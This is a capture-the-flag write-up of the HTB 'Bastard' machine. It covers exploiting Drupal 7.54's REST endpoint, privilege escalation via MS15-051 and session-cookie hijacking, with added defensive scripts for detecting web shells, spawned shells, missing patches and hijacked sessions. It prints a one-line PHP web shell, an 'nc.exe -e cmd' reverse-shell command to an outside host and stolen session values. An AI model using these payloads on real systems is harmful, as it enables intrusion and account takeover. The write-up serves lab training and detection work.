
HTB - Bastard


Basic Nmap scan

Nmap command: nmap -Pn -n -sC -sV -oA scan_boxs/bastard/nmap/10.10.10.9-d-scan 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.16s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Open ports : 80,135,49154

PORT   SERVICE  PRODUCT                 VERSION  EXTRAINFO
80     http     Microsoft IIS httpd     7.5
135    msrpc    Microsoft Windows RPC
49154  msrpc    Microsoft Windows RPC

It looks like Drupal 7 is hosted on the machine. Let's check whether we can pull the exact version. The robots.txt entries that Nmap listed show that CHANGELOG.txt and INSTALL.txt are accessible.


Drupal 7.54 is running on the machine.

Exploit - Drupal 7

searchsploit came up with a relevant exploit.

Edit the 41564.php exploit file and set url, endpoint_path and the file data (the data field holds the PHP web shell):

$url = 'http://10.10.10.9';        // target base URL
$endpoint_path = '/rest';         // path of the exposed REST endpoint
$endpoint = 'rest_endpoint';      // endpoint name

$file = [
    'filename' => 'cybo.php',     // file the exploit writes on the target
    'data' => '<?php echo system($_REQUEST["cmd"]); ?>'   // one-line PHP web shell
];

The first run failed: the exploit relies on the php-curl extension.

The exploit then ran successfully: it generated session.json and user.json locally and wrote the cybo.php file to the target.

alt

We have code execution.
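The one-line shell written by the exploit is exactly the kind of file a defender wants to find on a web root before it is used. The following heuristic scanner is an added example written for this page, not code from the writeup or from Drupal: it flags PHP files in which a command-execution or code-evaluation function is called with data from a request superglobal. The file names in SAMPLES are constructed; only the cybo.php contents come from the exploit configuration above.

```python
from __future__ import annotations

import re
from pathlib import Path

# PHP functions that run OS commands or evaluate code; fed with request data they form a web shell.
DANGEROUS_CALLS = ("shell_exec", "proc_open", "passthru", "system", "popen", "exec", "eval", "assert")
# Superglobals through which untrusted request data enters a script.
REQUEST_SOURCES = ("$_REQUEST", "$_GET", "$_POST", "$_COOKIE")

_CALL_RE = re.compile(r"\b(" + "|".join(DANGEROUS_CALLS) + r")\s*\(", re.IGNORECASE)


def webshell_indicators(source: str) -> list[str]:
    """Return the dangerous functions whose argument list references request input.

    Heuristic, not a PHP parser: scan to the parenthesis that closes the call and
    look for a request superglobal anywhere inside it, so nested forms such as
    eval(base64_decode($_POST['p'])) are caught as well."""
    hits = []
    for match in _CALL_RE.finditer(source):
        depth, pos = 1, match.end()
        while pos < len(source) and depth:
            depth += {"(": 1, ")": -1}.get(source[pos], 0)
            pos += 1
        args = source[match.end():pos - 1]
        if any(src in args for src in REQUEST_SOURCES):
            hits.append(match.group(1).lower())
    return hits


def scan_sources(sources: dict[str, str]) -> dict[str, list[str]]:
    """Scan path -> PHP source pairs; keep only the files that have indicators."""
    return {path: hits for path, src in sources.items() if (hits := webshell_indicators(src))}


def scan_webroot(root: str) -> dict[str, list[str]]:
    """Walk a web root (for example the IIS Drupal directory) and scan every .php file."""
    files = {str(p): p.read_text(errors="replace") for p in Path(root).rglob("*.php")}
    return scan_sources(files)


# Constructed samples: the shell from the exploit configuration beside two other files.
SAMPLES = {
    "cybo.php": '<?php echo system($_REQUEST["cmd"]); ?>',
    "includes/bootstrap.php": "<?php function drupal_bootstrap($phase) { return $phase; }",
    "misc/tool.php": "<?php eval(base64_decode($_POST['p'])); ?>",
}

if __name__ == "__main__":
    for path, hits in scan_sources(SAMPLES).items():
        print(f"{path}: {', '.join(hits)}")
```

Run scan_webroot() against the site directory from a scheduled task and alert on any new hit; pairing it with a file-integrity baseline of the Drupal tree catches shells that use obfuscation this regex does not recognise.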

systeminfo reveals that we are on Microsoft Windows Server 2008 R2 Datacenter.

Let's move to Burp so that we have better control over the requests we send.

Reverse shell

Generate a PowerShell reverse shell and submit the request.

Capture the reverse shell with ncat.

The current user is nt authority\iusr and we get the user flag.
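Seen from the server, the chain above is a web worker process spawning cmd.exe, which in turn launches PowerShell, all under the IIS anonymous account. The detection below is an added example written for this page (not from the writeup): it classifies process-creation events by parent image and user. Field names follow Sysmon event ID 1 (Image, ParentImage, User, CommandLine); the events are constructed, and the assumption that PHP on this IIS host runs as php-cgi.exe under w3wp.exe is mine, not something the writeup states.

```python
from __future__ import annotations

# Processes that serve web requests on an IIS/PHP host; they have no business launching shells.
WEB_WORKERS = {"w3wp.exe", "php-cgi.exe"}
# Interactive shells an attacker lands in after a web exploit.
SHELLS = {"cmd.exe", "powershell.exe"}
# The IIS anonymous account observed in the writeup (whoami returned nt authority\iusr).
WEB_ACCOUNTS = {r"nt authority\iusr"}


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> str | None:
    """Return a reason if a process-creation event looks like a web shell or reverse shell."""
    parent = image_name(event.get("ParentImage", ""))
    image = image_name(event.get("Image", ""))
    user = event.get("User", "").lower()
    if parent in WEB_WORKERS and image in SHELLS:
        return f"{parent} spawned {image}"
    if user in WEB_ACCOUNTS and image in SHELLS:
        return f"{image} running as {user}"
    return None


def find_suspicious(events: list[dict]) -> list[tuple[int, str]]:
    """Index and reason for every event that classify() flags."""
    return [(i, reason) for i, e in enumerate(events) if (reason := classify(e))]


# Constructed events modelling the chain in this writeup: the PHP worker runs the web shell's
# command, and that cmd.exe launches the PowerShell reverse shell. The last event is benign.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "User": r"IIS APPPOOL\DefaultAppPool"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\php\php-cgi.exe", "User": r"NT AUTHORITY\IUSR",
     "CommandLine": "cmd.exe /c systeminfo"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"NT AUTHORITY\IUSR",
     "CommandLine": "powershell.exe -nop -c <reverse shell omitted>"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"BASTARD\Administrator"},
]

if __name__ == "__main__":
    for index, reason in find_suspicious(SAMPLE_EVENTS):
        print(f"event {index}: {reason}")
```

The second rule matters because the child of the shell (here PowerShell) no longer has the web worker as its direct parent; keying on the service account catches the whole descendant tree, and on a server where IUSR never legitimately runs a shell it produces no noise.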

User Flag


Privilege Escalation

Time to download Sherlock and run it.


Sherlock found two vulnerabilities on the machine: MS15-051 and MS16-032.
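Sherlock reaches its verdict by inspecting file versions; the simpler check a server owner can run is whether the fixing KB article appears in the host's update list, which systeminfo already prints. The script below is an added example written for this page, not part of the writeup or of Sherlock: it parses the Hotfix(s) section of systeminfo output and reports which of the two bulletins lack their update. The KB numbers are taken from Microsoft's bulletins by me rather than from the page, and both systeminfo excerpts are constructed.

```python
from __future__ import annotations

import re

# Bulletin -> KB article of its fix. Sherlock checks for these two; the KB numbers are
# Microsoft's, supplied here by me rather than taken from the writeup (verify against the bulletin).
BULLETIN_KB = {
    "MS15-051": "KB3045171",  # Win32k kernel-mode driver elevation of privilege
    "MS16-032": "KB3139914",  # Secondary Logon elevation of privilege
}

# systeminfo lists installed updates as "[01]: KB2999226" lines under "Hotfix(s):".
_HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")
_OS_RE = re.compile(r"^OS Name:\s*(.+)$", re.MULTILINE)


def installed_hotfixes(systeminfo_output: str) -> set[str]:
    """All KB identifiers listed in the Hotfix(s) section."""
    return set(_HOTFIX_RE.findall(systeminfo_output))


def os_name(systeminfo_output: str) -> str:
    m = _OS_RE.search(systeminfo_output)
    return m.group(1).strip() if m else "unknown"


def missing_bulletins(systeminfo_output: str, bulletins: dict[str, str] = BULLETIN_KB) -> list[str]:
    """Bulletins whose fixing KB does not appear in the hotfix list, sorted by bulletin id."""
    have = installed_hotfixes(systeminfo_output)
    return sorted(b for b, kb in bulletins.items() if kb not in have)


# Constructed systeminfo excerpt for a host like the one in the writeup: 2008 R2 with a couple
# of unrelated updates and neither of the two fixes.
UNPATCHED = """\
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2999226
                           [02]: KB3042058
Network Card(s):           1 NIC(s) Installed.
"""

# The same host after both updates were installed (constructed).
PATCHED = """\
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB2999226
                           [02]: KB3042058
                           [03]: KB3045171
                           [04]: KB3139914
Network Card(s):           1 NIC(s) Installed.
"""

if __name__ == "__main__":
    print(os_name(UNPATCHED))
    print("missing:", missing_bulletins(UNPATCHED))
    print("missing after patching:", missing_bulletins(PATCHED))
```

One caveat for this KB-list approach: from late 2016 Windows 7 and Server 2008 R2 received monthly rollups that supersede the individual updates, so a host patched through rollups may be fixed without the exact KB appearing. Treat an absent KB as a prompt to check the binary version (which is what Sherlock does), not as proof of exposure.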

Exploit MS15-051

As with the HTB Devel machine, Bastard is exploitable through MS15-051, so we apply the same approach: download the exploit from https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051, upload ms15-051x64.exe and nc.exe to the target, and execute the following command in the PowerShell reverse shell we already have:

ps> cmd /c 'ms15-051x64.exe "nc.exe -e cmd 10.10.14.15 9002"'


Root Flag


Session hijacking route

Looking into the JSON files reveals a wealth of further information.

user.json

{
  "uid": "1",
  "name": "admin",
  "mail": "[email protected]",
  "theme": "",
  "created": "1489920428",
  "access": "1492102672",
  "login": 1660857975,
  "status": "1",
  "timezone": "Europe\/Athens",
  "language": "",
  "picture": null,
  "init": "[email protected]",
  "data": false,
  "roles": {
    "2": "authenticated user",
    "3": "administrator"
  },
  "rdf_mapping": {
    "rdftype": [
      "sioc:UserAccount"
    ],
    "name": {
      "predicates": [
        "foaf:name"
      ]
    },
    "homepage": {
      "predicates": [
        "foaf:page"
      ],
      "type": "rel"
    }
  },
  "pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"
}

Cracking the above hash would take a lot of time without a dedicated cracking rig, so for now we move on to the session.json file.
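The reason the hash is slow to crack is visible in the string itself: a Drupal 7 $S$ hash encodes its own work factor. The following is an added example written for this page, my Python port of the $S$ routines in Drupal 7's password.inc (it is not code from the writeup or from Drupal itself): it splits the hash into its fields, reproduces the iterated SHA-512 construction and Drupal's own base64 variant, and counts the digests an attacker pays per guess. The admin password is not known and not used; the round-trip check hashes a constructed password under a constructed setting with the same cost.

```python
from __future__ import annotations

import hashlib
import hmac

# Alphabet of Drupal 7's phpass-style base64 variant, and its fixed stored-hash length.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55
MIN_LOG2, MAX_LOG2 = 7, 30  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT


def parse_setting(stored: str) -> dict:
    """Split the 12-char setting prefix: '$S$' + one char log2(iterations) + 8-char salt."""
    if len(stored) < 12 or stored[:3] != "$S$":
        raise ValueError("not a Drupal 7 SHA-512 hash")
    count_log2 = ITOA64.index(stored[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError("iteration count outside Drupal's allowed range")
    return {"count_log2": count_log2, "iterations": 1 << count_log2, "salt": stored[4:12]}


def _password_base64_encode(data: bytes) -> str:
    """Port of Drupal's _password_base64_encode(): 3 input bytes -> 4 ITOA64 chars, little-endian."""
    out, i, n = [], 0, len(data)
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= n:
            break
    return "".join(out)


def drupal7_hash(password: str, setting: str) -> str:
    """Port of _password_crypt('sha512', ...): SHA-512(salt+pw), then 2^log2 rounds of SHA-512(h+pw)."""
    fields = parse_setting(setting)
    pw = password.encode("utf-8")
    h = hashlib.sha512(fields["salt"].encode("ascii") + pw).digest()
    for _ in range(fields["iterations"]):
        h = hashlib.sha512(h + pw).digest()
    return (setting[:12] + _password_base64_encode(h))[:DRUPAL_HASH_LENGTH]


def check_password(password: str, stored: str) -> bool:
    """What user_check_password() does for a $S$ hash: recompute with the stored setting and compare."""
    return hmac.compare_digest(drupal7_hash(password, stored), stored)


def sha512_calls_per_guess(stored: str) -> int:
    """Work per candidate password: the initial digest plus the iterated rounds."""
    return parse_setting(stored)["iterations"] + 1


# The admin hash from user.json above (the password itself is not known here).
ADMIN_HASH = "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"

if __name__ == "__main__":
    print(parse_setting(ADMIN_HASH))           # log2 count 15 -> 32768 rounds, salt RYKUR0xD
    print(sha512_calls_per_guess(ADMIN_HASH))  # 32769
    # Constructed: a fresh setting with the same cost, hashing a password chosen here.
    sample = drupal7_hash("correct horse battery", "$S$Dabcdefgh")
    print(sample, check_password("correct horse battery", sample))
```

The 'D' in position four maps to 15 in ITOA64, so every guess costs 32769 SHA-512 computations; that is the whole reason the author defers cracking. On the defensive side the same field is what to raise: Drupal 7's password_count_log2 variable controls the cost for newly set passwords, and existing hashes are upgraded on the next successful login.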

session.json

{
  "session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
  "session_id": "tKi5-kHOTCi2YAFZhRvM8PkHb6nvhofBBHByzanOCDU",
  "token": "_YZ5d9Kro9QJ0Tnei7tawhRfl-5AWg5j-YH9dpr7oqQ"
}

This is the page before injecting the cookie.

Session hijacking

Let's create a cookie, inject it and send a request.

Initially there is only one cookie. Let's edit it and save it with the session_name and session_id from the session.json file.


Saved cookie

Accessing the page again lands us in as admin.
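Server-side, the cookie edit above looks like one Drupal session value arriving from a second client address with a different browser while the original session is still live. The script below is an added example written for this page (not from the writeup): it parses constructed W3C-style IIS log lines that include the cs(Cookie) field, groups requests by Drupal session id, and flags any session used from more than one IP. The log lines are constructed; the cookie name and value are the ones from session.json, and the field layout assumes IIS logging was configured to include User-Agent and Cookie.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Drupal 7 names its session cookie SESS + 32 hex chars, as seen in session.json.
SESSION_COOKIE_RE = re.compile(r"\b(SESS[0-9a-f]{32})=([A-Za-z0-9_-]+)")


def parse_line(line: str) -> dict | None:
    """Parse a constructed W3C-style line: date time c-ip cs-method cs-uri-stem cs(User-Agent) cs(Cookie).

    IIS writes '+' in place of spaces inside the User-Agent, so whitespace splitting is safe."""
    parts = line.split()
    if line.startswith("#") or len(parts) != 7:
        return None
    date, time, ip, method, uri, agent, cookie = parts
    m = SESSION_COOKIE_RE.search(cookie)
    return {"time": f"{date} {time}", "ip": ip, "uri": uri, "agent": agent,
            "session": m.group(2) if m else None}


def sessions_by_client(lines) -> dict[str, dict[str, set[str]]]:
    """session id -> the set of client IPs and User-Agents that presented it."""
    seen = defaultdict(lambda: {"ips": set(), "agents": set()})
    for line in lines:
        rec = parse_line(line)
        if rec and rec["session"]:
            seen[rec["session"]]["ips"].add(rec["ip"])
            seen[rec["session"]]["agents"].add(rec["agent"])
    return seen


def hijacked_sessions(lines) -> dict[str, dict[str, set[str]]]:
    """Sessions used from more than one client IP (a changed User-Agent strengthens the signal)."""
    return {sid: info for sid, info in sessions_by_client(lines).items() if len(info["ips"]) > 1}


# Constructed log lines: the admin's own browsing, then the same cookie value from another
# address and client, then an unrelated session.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs(User-Agent) cs(Cookie)
2017-03-19 10:00:01 10.10.10.20 GET /user Mozilla/5.0+(Windows+NT+6.1) SESSd873f26fc11f2b7e6e4aa0f6fce59913=tKi5-kHOTCi2YAFZhRvM8PkHb6nvhofBBHByzanOCDU
2017-03-19 10:00:05 10.10.10.20 GET /admin Mozilla/5.0+(Windows+NT+6.1) SESSd873f26fc11f2b7e6e4aa0f6fce59913=tKi5-kHOTCi2YAFZhRvM8PkHb6nvhofBBHByzanOCDU
2017-03-19 10:02:17 10.10.14.15 GET /admin Mozilla/5.0+(X11;+Linux+x86_64) SESSd873f26fc11f2b7e6e4aa0f6fce59913=tKi5-kHOTCi2YAFZhRvM8PkHb6nvhofBBHByzanOCDU
2017-03-19 10:03:00 10.10.10.21 GET /node/1 Mozilla/5.0+(Windows+NT+6.1) SESSd873f26fc11f2b7e6e4aa0f6fce59913=constructedOtherSessionId01
""".splitlines()

if __name__ == "__main__":
    for sid, info in hijacked_sessions(SAMPLE_LOG).items():
        print(sid, "from", sorted(info["ips"]), "agents", sorted(info["agents"]))
```

Detection here is a compensating control: the session value was handed out by the REST endpoint the exploit abused, so the fix is to patch or remove that endpoint, keep session lifetimes short, and log Cookie in IIS so a check like this has something to read. Expect some false positives from users behind changing NAT addresses; a User-Agent change on top of the IP change is the stronger indicator.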